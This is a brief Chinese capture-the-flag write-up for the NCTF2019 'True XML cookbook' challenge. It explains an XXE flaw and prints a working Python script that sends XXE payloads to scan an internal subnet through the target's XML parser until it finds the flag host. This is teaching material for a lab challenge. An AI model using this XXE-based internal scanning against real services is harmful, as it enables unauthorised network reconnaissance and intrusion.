XXE+内网端口扫描

[NCTF2019]True XML cookbook - 星火不辍 - 博客园 (cnblogs.com)

[NCTF2019]True XML cookbook - L0VEhzzz - 博客园 (cnblogs.com)

XXE漏洞倒是不难，主要是扫描内网这里有点需要一手操作。

前面就是简单的XXE：

再用php://filter伪协议读了doLogin.php的源码后虽然拿到了账号密码，但是登进去后啥也没有。

这时候就扫一下网段：

用python扫描网段（需要设置timeout，不然脆弱的buu网站不一定扫得出来）：

import requests as res
url="http://f760501a-dce4-401c-9597-3745274e4f64.node4.buuoj.cn:81/doLogin.php"
rawPayload='<?xml version="1.0"?>'\
         '<!DOCTYPE note ['\
         '<!ENTITY payload SYSTEM "http://10.244.80.{}">'\
         ']>'\
         '<user>'\
         '<username>'\
         '&payload;'\
         '</username>'\
         '<password>'\
         '123'\
         '</password>'\
         '</user>'
for i in range(1,256):
    payload=rawPayload.format(i)
    #payload=rawPayload
    print(str("#{} =>").format(i),end='')
    try:
        resp=res.post(url,data=payload,timeout=0.5)
    except:
        continue
    else:
        print(resp.text,end='')
    finally:
        print('')

最后在10.244.80.167获得flag：